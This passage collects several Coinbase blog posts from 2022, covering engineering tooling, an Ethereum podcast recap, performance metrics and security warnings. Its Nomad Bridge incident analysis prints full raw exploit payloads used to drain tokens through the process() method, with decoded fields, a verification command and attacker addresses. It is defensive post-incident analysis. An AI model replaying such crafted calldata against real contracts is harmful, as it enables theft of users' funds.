Individual projects live in this folder. The folder path is formatted as “{project_name}/{src or test}/python/{namespace}”. The source root is configured as “src/python” or “test/python”, and the underneath namespace is used to isolate the modules.

4. Code owner files

Code owner files (OWNERS) are added to the folders to define the individuals or teams that are responsible for the code in the folder tree. The CI workflow invokes a script to compile all the OWNERS files into a CODEOWNERS file under “.github/”. Code owner approval rule requires all pull requests to have at least one approval from the group of code owners before they can be merged.

5. Tools

Tools folder contains the configuration files for the code quality tools, e.g. flake8, black, isort, mypy, etc. These files are referenced by Pants to configure the linters.

6. Buildkite workflow

Coinbase uses Buildkite as the CI platform. The Buildkite workflow and the hook definitions are defined in this folder. The CI workflow defines the steps such as

Check whether dependency lockfiles need updating.
Execute lints and code quality tools.
Build source code and docker images.
Runs unit and integration tests.
Generates reports of code coverages.

7. Dockerfiles

Dockerfiles are defined in this folder. The docker images are built by the CI workflow and deployed by Codeflow — an internal deployment platform at Coinbase.

8. Pants libraries

This folder contains the Pants script and the configuration files (pants.toml, pants.ci.toml).

This article describes how we build PyNest using the Pants build system. In our next blog post, we will explain dependency management and CI/CD.

Building a Python ecosystem for efficient and reliable development was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Decentralization, privacy, and a credibly neutral Ethereum

August 30, 2022 Coinbase

Tl;dr: The following post recaps this episode of Coinbase’s Around The Block podcast in which Viktor Bunin hosts Coinbase CEO Brian Armstrong and Ethereum co-founder Vitalik Buterin discuss decentralization, privacy, and a credibly neutral Ethereum.

By Viktor Bunin, Senior Protocol Specialist at Coinbase Cloud

After 7 years of research and development, the Merge is just around the corner. A crowning achievement, the Merge will finally transition Ethereum from Proof-of-work (PoW) to Proof-of-stake (PoS).

I encourage everyone to listen to the whole episode, but I wanted to take this opportunity to pull out what I believe are the key messages to take away from the conversation between two industry giants.

The transition to PoS wasn’t immediately obvious. As Vitalik put it, even if the idea can be scary as if it’s a pond filled with sharks, once you figure the sharks out, you at least know what you’re going up against, which makes it possible to deal with the problem.
Scientists and engineers are equally needed. Incredible researchers, like Vitalik, do the tough work of pushing the envelope on what’s possible, but it’s up to the builders to then take the baton, commercialize the products, and bring the technology to millions of users.
Good times create centralized projects. Bull markets tilt the scale from principles to expediency until a bear market tilts them back. The reality is that principles aren’t just principles, they result in decisions that keep projects secure and mindsets that keep builders building.
Decentralization is vital low in the stack. If the foundational layer breaks or is corrupted, everything built on top of it breaks as well.
Ethereum is more robust and decentralized on PoS. Anyone can spin up an Ethereum validator anywhere in the world with much less capital and technical skills compared to mining. All you need is a computer with an internet connection.
Ethereum will continue decentralizing its infrastructure operations. Proposer-Builder Separation will take away a validator’s ability to express a preference over the contents of the blocks they create, making censorship at the block level impossible.
OFAC took its first action involving DeFi. The recent Tornado Cash action is the first time OFAC has sanctioned a technology (smart contract) and it has raised questions with many groups (CoinCenter, EFF, CCI, etc.) about whether this was an overstep of OFAC’s authority.
Coinbase prioritizes and supports decentralization for Ethereum’s base layer. As mentioned earlier, decentralization is vital low in the stack, and there’s nothing lower than Ethereum’s base layer. In the hypothetical scenario where Coinbase is forced to censor, we would rather wind down our staking operation to preserve the integrity of the overall network.
Privacy is solvable. We can solve swaths of the challenges with privacy through technological solutions that enable user privacy while minimizing privacy for criminals.
We need to build the future we want to see. You need to make “stuff!” It doesn’t just magically appear. Decentralized identity must be created, it won’t spawn into being just because crypto becomes successful.
Values and culture must be cultivated. Whether the community is centralized or decentralized, it’s crucial for leaders to set and encourage cultural alignment around a set of values. Without cultivation, undesirable characteristics may rise and cause community fragmentation.
Crypto is global. The world is moving towards a global mindset and crypto is already there. One way in which Coinbase is adopting this mindset is by supporting global apps like Coinbase Wallet.
There are still unsolved problems. The best currency, building the “freedom stack,” e-charter cities, VR, climate change, and so on must be decided upon and created.

There’s still a lot more to build and it’s important we continue working together to build the future of crypto, grow the entire ecosystem, and remain eternally optimistic and collaborative.

Decentralization, privacy, and a credibly neutral Ethereum was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Performance Vitals: a unified scoring system to guide performance health and prioritization

August 26, 2022 Coinbase

coinbase

Tl;dr: The following post details how we measure client performance across products and cross-functional teams at Coinbase.

By Leonardo Zizzamia, Senior Staff Software Engineer

A lot has changed since 2018 when the Coinbase web team consisted of only a few engineers. Back then, while working on making our product faster with a small group across a single platform, we could rely on pre-existing open source tools.

In 2022, Coinbase now has engineers working across multiple product offerings and four platforms: React Web, React Native, Server Side Rendering and Chrome Extension. Performance across all four platforms had never previously been standardized, so we needed to address several aspects: a lack of sufficient, complete data for some platforms, the loss of efficiency when performance opportunities could not be identified, and consistent prioritization across all teams.

Knowing this, we introduced the Performance Vitals: A high-level scoring system that is clear, trusted, and easy to understand. Summarizing the performance health of an application into a reliable and consistent score helps increase urgency and directs company attention and resources towards addressing each performance opportunity.

Extending Google Web Vitals

The Web developer community has the Core Web Vitals standard to help measure client performance, which we have adopted and use actively at Coinbase.

Vital metrics are differentiated by thresholds that categorize each performance measurement as either “good”, “needs improvement”, or “poor”.

Below is one example of where the threshold could lie for one of the Web Vitals, Time to First Byte.

To classify overall performance of a client product, Coinbase follows best practices and uses the 85th percentile value of all measurements for that page or screen. In other words, if at least 85% of measurements on a site meet the “good” threshold, the site is classified as having “good” performance for that metric. This metric is 10 points higher than the Google Web Vitals standard, giving us enough bandwidth to fix potential regressions.

The primary tool we use to capture these metrics is the Perfume.js library, a wrapper around the Performance Observer API that helps us measure all Core Web Vitals. However, as we are the primary maintainer of this library, we used this opportunity to research and develop new solutions around web performance measurements and ways of attribution.

Today we introduce an innovative, in-house metric we call the Navigation Total Blocking Time (NTBT). The NTBT measures the amount of time the application may be blocked from processing code during the 2 second window after a user navigates from page A to page B. The NTBT metric is the summation of the blocking time for all long tasks within the 2s window after this method is invoked.

The image below is an example of an NTBT performance mark in coinbase.com helping a client engineer track down the long task and improve responsiveness when navigating between pages.

Another way it is helpful to use Perfume.js is that we are able to enrich all the metrics with the Navigator APIs info, to differentiate between low-end and high-end experiences.

After adopting and extending Web Vitals, the next step for us was to repurpose this knowledge throughout our stack.

Coinbase Performance Vitals

In addition to building web apps, we build React Native mobile apps and the services that provide their data. We re-used the Web Vitals best practices and created new metrics to serve React Native applications and our Backend services. Together, we call them “Performance Vitals”, and they give us a holistic view of the performance scores of all of our applications, from downstream (Browser & Apps) to upstream (Backend Services).

As seen in the chart below, the Performance Vitals are divided end-to-end, from downstream to upstream.

Creating React Native Vitals

When evaluating performance for React Native we developed the initial Vitals of App Render Complete and Navigation Total Blocking Time.

App Render Complete (ARC): Measures the amount of time it takes to get from starting the application to fully rendering the content to the user without loading indicators. The Good threshold of 5s is based on guidance from the Android community official research.
Navigation Total Blocking Time (NTBT): Measures the amount of time the application may be blocked from processing code during the 2s window after a user navigates from screen A to screen B.

For NTBT we used the existing knowledge around Total Blocking Time from Web Vitals to determine a threshold for mobile. Given that a good TBT on Web is 200ms and we anticipate mobile to take longer, we doubled the standard from Web to arrive at 400ms for mobile.

The following video shows how a product engineer can detect long-tasks, measure total blocking time when navigating between pages, and additional NTBT measurements.

This metric helps catch potential sluggishness in a user interface, usually caused by executing long tasks on the main thread, blocking rendering, or expending too much processor power on background processes.

Similar to the experience of Web, Coinbase built an in-house React Native Core Vitals library to measure this performance, with the goal of open sourcing our discovery back to the community in the coming quarters.

Creating Backend Vitals

As we did with Web and React Native Vitals, we extended the Vitals standard to backend services including GraphQL and Backend Services.

The two metrics we first created are:

GraphQL Response Time (GRT): Round trip time for the GraphQL service to serve a request.
Upstream Response Time (URT): Round trip time for the API Gateway to serve a backend service.

To determine a Good Score to represent backend latency, we considered several points:

From a user’s perspective, the system response time feels immediate when it is less than 1s.
We also have to take into account that the network cost could vary between 50ms-500ms, depending on which region a user is reaching our product from.
Based on points 1 and 2, GraphQL latency should not exceed 500ms, meaning the upstream services must respond in under 300ms because GraphQL queries have to await the slowest endpoint.
Therefore, we concluded that the threshold for a GRT Good score is 500ms, and URT Good score is 300ms.

For Backend Vitals we aim for at least 99 percent of measurements for each logged request to meet the “Good” threshold.

As we continue to improve our performance, we will revisit our Good scores annually, potentially even lowering them over time so we can further lower latency for our users.

The instrumentation for Backend Vitals is made up of three essential pieces. First, we use our in-house analytics library to define metadata like the product, platform, and pages. Then, we propagate this information into our APIs, and ultimately we co-locate the performance metrics with the Web or React Native metadata.

Performance Vitals discoverability and prioritization

Using the same metric scoring and attribution system across different specialties at Coinbase makes it easy to identify areas of opportunity and aligns both frontend and backend engineers in performance efforts.

All Performance Vitals are based on real-time data from our production applications and can be discovered by standardized filters, such as: product name, platform, page, is logged in, geo region, GraphQL operation, and backend service.

This level of accuracy becomes especially useful for Real Time Anomaly Detection. All teams are able to own the performance metrics for their product surface, giving them the ability to have automated monitors for performance changes and be alerted when regressions occur.

In case of a performance regression, we use the percentage of the regression to determine if it’s critical to open an incident and mitigate the issue as soon as possible, or create a bug that can be solved in the coming sprint.

Quarterly and annual planning

Performance Vitals are perfect for KR planning, as they measure a score from 0 to 100 and they can be easily stored for over a year. Common language for all performance KRs also makes it easier to create shared goals for teams across the organization.

A few examples of how you can frame your KRs are:

[Year KR] Reach NTBT Good Score of 90%, up from 70% in the Coinbase Mobile App.
[Quarter KR] Improve LCP Good Score from 70% to 85% in the Coinbase Web.

Up Next

Performance Vitals come back to finding a common language, whether it’s standardizing filters, setting quarterly KR’s, or unifying a scoring system. From a small team working on an API regression to large initiatives led by multiple organizations, speaking the same language helps all types of product prioritization.

In the future, we plan to open source some of our learnings and share more about measuring and driving impact for Critical User Journeys and how we use automation and internal processes to enable everyone at Coinbase to build performant products.

Performance Vitals: a unified scoring system to guide performance health and prioritization was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Security PSA: Protecting ERC-20 assets from malicious actors

August 25, 2022 Coinbase

coinbase

Tl;dr: At Coinbase, our top priority is, and always will be, protecting you and your digital assets. That’s why we secure Coinbase with the latest industry-leading technology and work with the larger community to build a safer crypto ecosystem so that everyone is able to succeed.

In this blog post, we share how a contract with dangerous superuser roles is only as secure as the protections on those roles and discuss controls including multisig, a governance contract, or revoked privileges that asset issuers can implement to prevent a single actor from exercising privileges in a malicious way.

By The Coinbase Digital Asset & Protocol Security Team

At Coinbase, when considering assets for listing we define a risky function as any function that can impact user balance transfer or amounts — directly or indirectly. This can be as direct as a superuser being able to burn funds on anyone’s behalf, or as indirect as the ability to upgrade the token, which could change the token and/or user balances. Since Coinbase custodies assets on behalf of users, Coinbase Security needs to be able to provide users with the peace of mind that their tokens are safe. Therefore, any risky functionality within an asset reduces its eligibility for being listed on Coinbase.

That said, even a token with risky functionality can potentially be eligible for listing if it has sufficient protections in place. Common protections of this nature are multisigs, governance contracts and revoking privilege.

How to Secure a Risky Function with Access Modifiers

When projects need to use functions like burn() or upgrade(), developers must consider appropriate access controls to prevent a single user from calling the risky function. Any individual who holds a role that can perform risky functions exposes the asset to insider threats. Additionally, even if that user is trustworthy, an attacker compromising their key is another route by which token holders can be harmed by centralized superuser privileges.

Superuser Risk with Access Modifiers

A contract with dangerous superuser roles is only as secure as the protections on those roles. When a privileged user has their key compromised, an attacker may abuse that superuser role to call risky functions. Below we’ve outlined a compromised token project that uses an access modifier to restrict the project to a superuser controlled by a single individual.

Although Tim and his team restricted access to the risky function, the role was controlled only by a single key owned by Tim. Tim’s key was compromised and the attacker upgraded the contract, the attacker had full control of the project.

To mitigate superuser risk on access-restricted functions, token project teams can implement multisigs, governance contracts or revoke privileges behind the superuser role to decentralize/revoke access to call the function. Teams can assign privileged roles to a multisig/governance contract or the null address (0x00…) to prevent scenarios like Tim’s Downfall Token from occurring.

Protecting ERC-20 Assets from Malicious Actors

To better understand mitigations to superuser risk, we’ve outlined three (3) scenarios where the design of the privileged access mapped to the superuser role helped protect the token project when the original superuser’s key was compromised.

Why it Matters

The increased security offered by cryptocurrency is a big reason why digital money was created. Unlike traditional currencies, cryptocurrencies such as Bitcoin and Ethereum are open-source, meaning anyone can inspect the blockchains they run on, assuring that every transaction is accurate.

To create a fair and open financial system, we’ve developed a deliberate approach for adding new assets to our platform. Every ERC-20 asset on Coinbase goes through an extensive security review process to assess the custodial risk of funds and ensure that risky functions are appropriately mitigated. This gives token holders, whether they hold their tokens at an exchange like Coinbase or in a self-custodied wallet, stronger assurance in ownership of their tokens.

At Coinbase, we believe that everyone deserves access to financial services that can help empower them to create a better life for themselves and their families. If the world economy ran on a common set of standards that could not be manipulated by any one actor, the world would be a more fair and free place, and human progress would accelerate.

If you’re interested in listing your token with Coinbase, visit the Coinbase Asset Hub.

We understand that trust is built on dependable security — which is why we make protecting your account & your digital assets our number one priority. Learn more here.

Security PSA: Protecting ERC-20 assets from malicious actors was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Security PSA: Sha Zhu Pan (Pig Butchering) Investment Scams

August 18, 2022 Coinbase

Tl;dr Coinbase has seen a concerning increase in fraudulent cryptocurrency investment platforms that are sourcing victims through connections on dating apps and social media. We are encouraging our users to be vigilant against this type of social engineering scam.

The Coinbase Security team has previously submitted the domains in this blog, in addition to several other related domains, to Google Safe Browsing for alerting users when browsing to these sites.

By Coinbase Global Investigations and Threat Intelligence

Coinbase works closely with law enforcement partners across the globe to protect our customers from an array of targeted cyber attacks. Recently, a noteworthy increase in scams purporting to be foreign exchanges or crypto trading platforms that are spread by scammers met on dating apps has been reported. While investment scams and romance scams are not unique to the cryptocurrency ecosystem, the irreversible nature of cryptocurrency transactions can make these scams devastating. This scheme is particularly effective because it relies on a scammer building trust with their victim sometimes over a long time period of weeks or months.

The scam typically follows this chain of events:

Victims are contacted through social media, have matched with the scammer on a dating app, or have been contacted on instant messaging applications.
The scammer encourages the victim to migrate their conversation to an encrypted messaging service, such as WhatsApp or WeChat, sometimes communicating for weeks or months before mentioning an investment opportunity.
The scammer typically claims they have received great financial returns from a cryptocurrency trading or mining platform and convince their victim to co-invest with them or teach them how to trade successfully.
Victims are directed to visit a fraudulent website that often looks like a legitimate trading platform and coached into depositing funds.
Some victims even receive a small amount of funds that are claimed to be “returns” on their investment to entice them to invest even larger sums.
When the victim tries to withdraw funds from the site, they are then often told they owe a tax payment or service fee before their funds will be released in an effort to further extort them for money.

How we have been working to protect our users:

Teams across Coinbase work to identify and add addresses associated with scams to our products’ blocklists to aid in protecting our customers.
Security teams frequently conduct scans to identify clusterings of existing scam sites and collaborate with law enforcement to enforce takedowns. These teams have increased monitoring to identify new sites that have the potential to be similarly abused.
While it is impossible to predict all addresses associated with scams, we conduct blockchain analysis on known scam addresses to map out related wallets and we communicate with other exchanges to inform them when they may be receiving these scammed funds.
We routinely collaborate with law enforcement to share intel on emerging scams and support their investigations into bad actors.

The following steps can be taken to protect yourself:

Be skeptical of investment opportunities from people you meet through online forums or dating apps, even if you have been communicating for a while. If they claim to have an exclusive or urgent opportunity, this is a big red flag.
Don’t disclose your current financial status to people you’ve met online and don’t post any of your financial information on social media.
Independently research any trading platform you are considering sending money to, including using consumer protection websites.
Please report any scams including the URL and the receiving cryptocurrency address to security@coinbase.com.
If you become aware of a scam, please report it to the FBI’s Internet Crimes Complaint Center.
Report any scam websites to Google Safebrowsing

Investment scam landing pages often look like the following:

Security PSA: Sha Zhu Pan (Pig Butchering) Investment Scams was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Nomad Bridge incident analysis

August 9, 2022 Coinbase

coinbase

Tl;dr: Building a better crypto ecosystem means building a better, more equitable future for us all. That’s why we are investing in the larger community to make sure anyone who wants to participate in the crypto economy can do so in a secure way. In this blog post, we share lessons about the nature of the vulnerability, exploitation methodology, as well as on-chain analysis of attacker behavior during the Nomad Bridge incident.

While the Nomad bridge compromise does not directly affect Coinbase, we strongly believe that attacks on any crypto business are bad for the industry as a whole and hope the information in the blog will help strengthen and inform similar projects about threats and techniques used by malicious actors.

By: Peter Kacherginsky, Threat Intelligence and Heidi Wilder, Special Investigations

On August 1, 2022 Nomad Bridge suffered the fourth largest DeFi hack with more than $186M stolen in just a few hours. As we have described in our recent blog post, from the $540M Ronin Bridge compromise in March to the $250M Wormhole bridge hack in February of 2022, it is not a coincidence that DeFi bridges constitute some of the most costly incidents in our industry.

What makes the Nomad Bridge compromise unique is the simplicity of the exploit and the sheer number of individuals taking advantage of it to empty all stored assets piece by piece.

Vulnerability Analysis

Nomad is a bridging protocol supporting Ethereum, Moonbeam, and other chains. Nomad’s bridging protocol is built using both on-chain and off-chain components. On-chain smart contracts are used to collect and distribute bridged funds while off-chain agents relay and verify messages between different blockchains. Each blockchain deploys a Replica contract which validates and stores messages in a Merkle tree structure. Messages can be validated by either providing proof with the proveAndProcess() call or for already verified messages they can be simply submitted with the process() call. Verified messages are forwarded to a Bridge handler (e.g. ERC20 Router) which can distribute bridged assets.

On April 21, 2022 Nomad deployed a Replica proxy contract to handle processing and validation of users’ claims of bridged assets. This proxy would allow Nomad to easily change implementation logic while retaining storage across upgrades. As part of the proxy deployment, Nomad set initial contract parameters defined in the snippet below:

Notice the highlighted confirmAt map assignment which sets an initial entry for the trusted _committedRoot to the value of 1. The variable _committedRoot is provided as an initialization parameter by Nomad’s contract deployer. Let’s see what it was set to during the initialization:

Interestingly the initialization parameter _committedRoot was set to 0. As a result the confirmAt map now has a value of 1 for a 0 entry that from April to this day:

On June 21, 2022, Nomad performed a series of upgrades to its bridging infrastructure including the Replica implementation. One of the changes included updates to the message verification logic in the process() function:

The message verification flow now includes a call to the acceptableRoot() method which in turn references confirmAt map we mentioned above:

The vulnerability appears in a scenario when fraudulent messages, not present in the trusted messages[] map, are sent directly to the process() method. In this scenario messages[_messageHash] returns a default null value for non-existent entries so the acceptableRoot() method is called as follows:

In turn, the acceptableRoot() method will perform a lookup against confirmAt[] map with a null value as follows:

As we mentioned in the beginning of this section, confirmAt[] map has a null entry defined resulting in acceptableRoot() returning True and authorizing fraudulent messages.

Exploit Analysis

The exploit takes advantage of the above vulnerability by crafting a message which tricks Nomad bridge into sending stored tokens without proper authorization. Below is a sample process() payload in a transaction submitted by 0xb5c5…590e:

The Replica message has the following structure:

The recipient specific _messageBody contains transaction data to be processed by the _recipient. Nomad recipients accept several transaction and message types, but we will focus on the transfer type:

Decoding the above payload illustrates how 0xb5c55f76f90cc528b2609109ca14d8d84593590e was able to steal 100 WBTC by submitting a specially crafted payload to bypass Nomad’s message checks.

In order to better understand the root cause of the exploit we developed a PoC to demonstrate it draining the entire token’s balance on the bridge in just a few transactions:

While writing a PoC we found it curious that attackers chose to extract funds in smaller increments when they could have drained the whole amount in a single transaction. This is likely due to the attackers not crafting bridge messages from scratch, but instead replaying existing transactions with patched receiving addresses.

On-Chain Analysis

Over $186M in ERC-20 tokens were stolen from the Nomad Bridge between August 1, 2022 at 21:32 UTC and August 2, 2022 at 05:49 UTC. The highest volume in stolen tokens were primarily USDC, followed by WETH, WBTC, and CQT. Within the first hour of the exploit, only WBTC and WETH were stolen, then followed by several other ERC-20s.

Source: Dune Dashboard

In analyzing the blockchain data, we see that there were various addresses piggybacking off of the original exploiters and using almost identical input data with modified recipient addresses in order to siphon off the same token for the same amount. Once the WBTC contract was mostly drained, the attackers then went on to drain the WETH contract, and so on.

Further analyzing the first attackers in block 15259101, we find that the initial two attacker addresses leveraged a helper contract to obfuscate the exact exploit. Unfortunately, within that same block, several indexes down another exploiter address seem to have struggled interacting with the helper contract and decided to bypass it — and publicly expose the exploit input data in the process. Other addresses in the same and latter blocks then followed suit and used almost identical payloads to conduct the exploit.

Following the initial exploitation, and due to the ease of triggering the exploit, hundreds of copycats joined a massive exploitation of a single contract. While analyzing the payloads of various future attackers, we found that there was not only the reuse of the same tokens being bridged over and the same amounts, but also that funds were consistently being “bridged” from Moonbeam just like the original exploit.

The attack happened in three stages:the vulnerability testing a day prior to the attack, the initial exploit targeting WBTC stored on the bridge, and the copycat stage involving hundreds of unique addresses. Let’s dive into each of these including partial return of stolen assets.

Vulnerability Testing

Throughout July 31, 2022, bitliq[.]eth was found to trigger the vulnerability using small amounts of WBTC and other tokens. For example, on Jul-31–2022 11:19:39 AM +UTC he sent a transaction to the process() method on Ethereum blockchain with the following payload:

0x617661780000000000000000000000005e5ea959686c73ed32c1bc71892f7f317d13a267000000390065746800000000000000000000000088a69b4e698a4b090df6cf5bd7b2d47325ad30a36176617800000000000000000000000050b7545627a5162f82a992c33b87adc75187b21803000000000000000000000000a8c83b1b30291a3a1a118058b5445cc83041cd9d000000000000000000000000000000000000000000000000000000000000f6088a36a47f8e81af64c44b079c42742190bbb402efb94e91c9515388af4c0669eb

The payload can be decoded as follows:

Originating chain: “avax”
Destination chain: “eth”
Recipient: a8c83b1b30291a3a1a118058b5445cc83041cd9d (bitliq[.]eth)
Token Address: 0x50b7545627a5162F82A992c33b87aDc75187B218 (WBTC.e on Avalanche)
Amount: 0.00062984 BTC

This corresponds to 0.00062984 BTC transaction sent to the bridge on the Avalanche chain.

The payload was sent using the process() method as opposed to the more common proveAndProcess() and was not present in the messages[] map in the prior to execution in block 15249928 :

$ cast call 0x5d94309e5a0090b165fa4181519701637b6daeba "messages(bytes32)" "bc0f99a3ac1593c73dbbfe9e8dd29c749d8e1791cbe7f3e13d9ffd3ddea57284" --rpc-url $MAINNET_RPC_URL --block 15249928

0x0000000000000000000000000000000000000000000000000000000000000000

The transaction succeeded even without providing necessary proof by triggering the vulnerability in the acceptableRoot() method by supplying it with a 0x0 root hash value as illustrated in the debugger below:

Source: Tenderly Debugger

Messages not present in the messages[] storage can be validated using the proveAndProcess() method; however, since the address called process() directly they have triggered the vulnerability.

Interestingly enough, it seems that bitliq[.]eth was also likely testing the ERC-20 bridge contract an hour prior to the exploit and bridged over 0.01 WBTC over to Moonbeam. [Tx]

Initial Exploitation

Active exploitation started on August 1, 2022 all within the same block 15259101 and resulted in combined theft of 400 BTC.

All four transactions used identical exploit payloads with the exception of a recipient address as described in the Vulnerability section above:

0x6265616d000000000000000000000000d3dfd3ede74e0dcebc1aa685e151332857efce2d000013d60065746800000000000000000000000088a69b4e698a4b090df6cf5bd7b2d47325ad30a3006574680000000000000000000000002260fac5e5542a773aa44fbcfedf7c193bc2c59903000000000000000000000000f57113d8f6ff35747737f026fe0b37d4d7f4277700000000000000000000000000000000000000000000000000000002540be400e6e85ded018819209cfb948d074cb65de145734b5b0852e4a5db25cac2b8c39a

Some observations on the above:

The first three addresses were funded by Tornado Cash and have been actively transacting with each other which indicates a single actor group.
Unlike the first two exploit transactions, 0xb5c5…590e and bitliq[.]eth sent the exploit payload directly to the contract and without the use of flashbots to hide it from public mempool.
bitliq[.]eth replayed an earlier exploit transaction in the same block 15259101 as 0xb5c5…590e indicating either prior knowledge of the exploit or learning about 0xb1fe…ae28 from the mempool.
All four transactions used identical payloads, each stealing 100 WBTC at a time.

Copycats

In total, 88% of addresses conducting the exploits were identified as copycats and together they stole about $88M in tokens from the bridge.

The majority of copycats used a variation of the original exploit by simply modifying targeted tokens, amounts, and recipient addresses. We can classify unique payloads by grouping them based on contracts they call and unique method 4bytes invoked as illustrated below:

Based on our analysis, more than 88% of unique addresses called the vulnerable contract directly using the 928bc4b2 function identifier which corresponds to the process(bytes) method used in the original exploit. The remainder perform the same call using intermediary contracts such as 1cff79cd which is the execute(address,bytes) method, batching multiple process() transactions together, and other minor variations.

Following the initial compromise, the original exploiters had to compete against hundreds of copycats:

While the majority of valuable tokens were claimed by just two of the original exploiters’ addresses, hundreds of others were able to claim part of bridge’s holdings:

Below is a chart showing the tokens stolen over time in USD. It becomes apparent that the exploiters were going token by token as they were draining the bridge.

The Great Return

To date, 12% stolen from the Nomad Bridge contract has been returned — including partial returns. The majority of the returns took place in the hours following Nomad Bridge’s request to send funds to the recovery address on August 3, 2022. [Tweet, Tx]

Below is a breakdown of the funds returned, which includes ETH and various other tokens, some of which were never even on the bridge:

Funds continue to be sent back to the bridge’s recovery address, albeit more slowly in the recent days than when the address was initially posted:

The majority of returned funds appear to be in USDC, followed by DAI, CQT, WETH, and WBTC. This is notably different from the breakdown of the tokens exploited. The reason being that the initial original exploiters primarily drained the bridge of WBTC and WETH. Unlike later stage exploiters, these exploiters moved funds around with no intent to return them.

Interestingly, one of the original exploiters, bitliq[.]eth, has returned only 100 ETH to the bridge contract, but has begun cashing out the rest of their proceeds through renBTC and burning it in exchange for BTC.

Categorizing the “exploiters”

When assessing the Nomad Bridge exploiters, the attackers were categorized into the following buckets:

Black hats: Those that don’t return funds and continue moving them onwards.
White hats: Those that fully send funds back to the recovery addresses
Please note that while we are using the term white hat for explanatory purposes here, the initial taking of the funds was not authorized and is not an activity we would endorse.
Grey hats: Those that partially send funds back to the recovery addresses.
Unknown unknowns: Those that have yet to move funds.

Approximately 24% of funds continue to sit untouched. We suspect these are either attackers waiting out the heat or shrewd degens holding out for a bounty from Nomad. However, the largest volume of funds has moved onwards. As of August 5, we estimate that ~64% has moved onwards.

To stay up to date with the latest in terms of the funds returned, check out this dashboard.

Delving Into the Blackhats

Of those funds that have moved onwards, we have identified several large rings of addresses that all commingle funds. In particular, one cluster of addresses seems to have amassed over $62M in volume. Interestingly, one address within this cluster was the first address to have conducted the exploit [tx hash].

To date, we primarily see these rings following one of the below patterns:

MEV bot activity
Commingle and hold on to wait out the heat
Swapping funds and eventually returning a partial amount of funds to the recovery address
Swapping funds and investing DeFi projects or cashing out at various CEXs
Moving funds through Tornado Cash

Below is an example of how some addresses have begun moving funds through Tornado Cash, which as of August 8, 2022, is a sanctioned entity.

Beware of Scams:

Several white hats have already returned over 10% of funds to the bridge contract. However, this wasn’t without hiccups.

Originally, the Nomad team posted on both Twitter and on the blockchain the Ethereum address to send any exploited funds to

However, scammers cleverly followed suit and set up various fraudulent ENS domains to pose as the Nomad team and requested they have funds sent to vanity addresses with the same initial characters as the legitimate recovery address.

For example, below is a message sent by one of the scammers. Note the fraudulent recovery address, ENS domain, and also the 10% bounty off. Nomad has since offered that white hats claim 10% of exploited proceeds. [Tx]

Protecting Yourself

While most contracts are audited extensively by various blockchain auditors, contracts may still contain yet to be discovered vulnerabilities. While you may want to provide liquidity to a particular protocol or bridge over funds, here are some tips to keep in mind:

When supplying liquidity, don’t keep all of your funds on one protocol or stored in the bridge.
Make sure to regularly review and revoke any contract approvals you don’t actively need.
Stay up to date with security intelligence feeds to track protocols you’ve invested in.

Coinbase is committed to improving our security and the wider industry’s security, as well as protecting our users. We believe that exploits like these can be mitigated and ultimately prevented. Besides making codebases open source for the public to review, we recommend frequent protocol audits, implement bug bounty programs, and actively work with security researchers. Although this exploit was a difficult learning experience, we believe that understanding how the exploit occurred can only help further mature our young industry.

References

Exploit PoC by Peter Kacherginsky
Dune Dashboard by Heidi Wilder.
Initial Exploit Analysis by samczsun

Indicators

Initial exploiters:

Ethereum: 0x56d8b635a7c88fd1104d23d632af40c1c3aac4e3
Ethereum: 0xf57113d8f6ff35747737f026fe0b37d4d7f42777
Ethereum: 0xb88189cd5168c4676bd93e9768497155956f8445
Ethereum: 0x847e74d8cd0d4bc2716a6382736ae2870db94148
Ethereum: 0x000000000000660def84e69995117c0176ba446e
Ethereum: 0xb5c55f76f90cc528b2609109ca14d8d84593590e
Ethereum: 0xa8c83b1b30291a3a1a118058b5445cc83041cd9d

See Dune Dashboard for a complete listing of exploiter addresses, transactions, and live status of stolen assets.

Nomad Bridge incident analysis was originally published in The Coinbase Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Security PSA: Search engine phishing

July 25, 2022 Coinbase

coinbase

Tl;dr: Search engine phishing exploits the trust we have in search engines and the convenience of searching for something rather than remembering the domain. The following piece outlines what search engine phishing attacks may look like and how Coinbase users can avoid them.

By Coinbase Security Team

How do you log in to Coinbase? If you’re like many people, you open your preferred browser and type “Coinbase” or “Coinbase login” in the address bar. You expect to get results like this:

But sometimes you may get results like this:

The second set of screenshots show an example of phishing links. This is called search engine phishing and it has become a trend for attackers targeting Coinbase accounts.

When most people think of phishing, email or SMS phishing comes to mind. However, phishing can take many forms. Search engine phishing exploits the trust we have in search engines and the convenience of searching for something rather than remembering the domain.

We all do it, but this opens us up to potential search engine phishing attacks if we are not diligent about checking our links and protecting ourselves online. Here are some tips to prevent this from happening to you:

Double-check our naming conventions

Coinbase uses a uniform naming convention for our websites and pages. The convention follows this pattern: [page].coinbase.com. For example, here are some of our pages:

One way to avoid this type of scam is to bookmark the above Coinbase pages that you frequent. Bookmarking removes the need to search for, or manually type, a domain name. Here is a quick tutorial on how to create bookmarks in the most popular browsers.

Know common scam naming conventions

It takes a good amount of work for anyone to get their website ranked high in search engine results. This is called Search Engine Optimization (SEO), which is the process of improving the traffic from search engines to a website. Some website services, including Google Sites and Microsoft Azure, offer built-in SEO functionality.

As seen in the screenshots above, attackers tend to exploit website services like Google Sites and Microsoft Azure — building a false sense of trust in the phishing link.. The naming conventions might follow a pattern like one of the following:

sites.google.com/[phishingpage].com
[phishingpage].azurewebsites.net

These phishing websites will typically then redirect to another phishing page after a victim clicks a button on the site. The redirect will take the victim to a second phishing page where the actual phishing attack happens. Using a second phishing site is a way for attackers to protect the first phishing site and maintain its SEO ranking. So, be aware of redirects as an indication that you may be visiting a phishing website. A typical flow may look like this:

Look for these red flags

Here are some indicators you can look for to protect yourself from search engine phishing:

Does the naming convention of the search result follow this pattern: [page].coinbase.com? If not, it is likely a phishing page.
When you click on a search result, are you redirected to a website with a different domain than what you expected? If so, it is likely a phishing page.
When you click on a search result, does the website look different than the last time you logged in to Coinbase? If so, this could be a phishing page which is using an older version of our website theme.
When you visit the website from the search results and click on a button, are you redirected to a website with a different domain than the first page? If so, it is likely a phishing page.
